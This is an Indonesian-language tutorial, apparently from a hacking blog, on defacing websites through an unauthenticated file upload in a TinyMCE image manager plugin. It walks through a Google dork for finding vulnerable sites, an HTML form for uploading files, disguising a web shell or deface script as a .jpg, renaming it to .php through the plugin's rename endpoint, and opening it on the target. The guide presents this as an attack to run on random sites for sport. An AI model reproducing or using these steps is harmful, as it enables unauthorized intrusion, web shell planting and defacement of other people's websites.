Yo wassap gengs balik lagi sama gua disini
Kali ini gua bakal bikin tutorial lagi, yaitu
Tutorial Deface dengan TinyMCE Image Manager. Oke gengs langsung aja kita
siapkan bahan bahan buat deface nya
1. PC
/ Laptop / HP
2. Koneksi
internet
3. CSRF
4. Dork
Kalo sudah siap semuanya langsung aja kita mulai ya.
Pertama kita buka browsernya dulu gengs ya, kalo
udah dibuka browsernya langsung aja buka web search engine nya, ditutorial saya
kali ini saya masih tetep make google. Kenapa make google ? biar sama aja kayak
yang lain. Oke lanjut
Kalo udah buka google langsung aja kita masukin dork
nya, dork gua kali ini adalah
Inurl:/plugins/image/upload/
Kalo udah lu masukin dorknya, tinggal lu pilih pilih
aja mana web yang vuln
Nah kalo lu udah nemu webnya yang mana langsung aja
masukin exploitnya gengs
Exploitnya: sayangkamu.io/[path]/plugins/image/upload.php
Nah kalo sudah dimasukin exploitnya tunggu sampe
proses nya selesai, lalu gimana kalo vuln atau enggak nya. Kalo vuln
tampilannya bakal kayak gini
Lihat gambar!!
Nah kalo sudah tinggal masukin aja ke CSRF nya
<form
enctype="multipart/form-data"
action="site.com/path/tinymce/plugins/image/upload.php"
method="post"><input type="file" name="upl"
multiple="multiple"><input type="submit" value="Upload"></form>
Nah kalo saya selalu pake CSRF online jadi nanti
waktu penerapannya silahkan disesuaikan saja
Oke, lanjut..
Masukin link web target yang sudah diexploit tadi
Kalo sudah tinggal di lock saja langsung ya, tunggu
sampe selesai loading nya
Terus kalo sudah tinggal upload filenya, yang
diupload harus berextensi .jpg, .jpeg, .png
Untuk bikin nya. Ubah extensi shell / scriptc deface
kalian ke extensi diatas, loh kok pake extensi tersebut nanti pas di akses file
nya malah blank hitam. Tenang dulu nanti bakal ada step by step nya
Lanjut dulu
Nah kalo sudah diupload nanti bakal muncul link file
yang sudah diupload tadi, biasanya file yang sudah diupload bakal jadi random
nama filenya, tapi kebetulan punya gua tidak gengs. Coba lihat gambar untuk
hasil, jika sukses terupload
Lihat gambar !!
Nah kalo sudah selesai kemudian kita rename geng
nama file nya dari jpg ke php
Caranya begini
Sayangkamu.io/[path]/plugins/image/rename_file.php?current_name=namafile.jpg&new_name=nama
file.php
Lihat gambar gengs
Jika sukses rename maka tampilannya bakal jadi kayak
gini
Nah sekarang lu tinggal akses file lu tadi aja
Aksesnya di
site.com/path/tinymce/plugins/image/uploads/namafile.php
Oke gengs selamat mencoba. Silahkan dikembangkan
lagi biar dapet banyak
Terima Kasih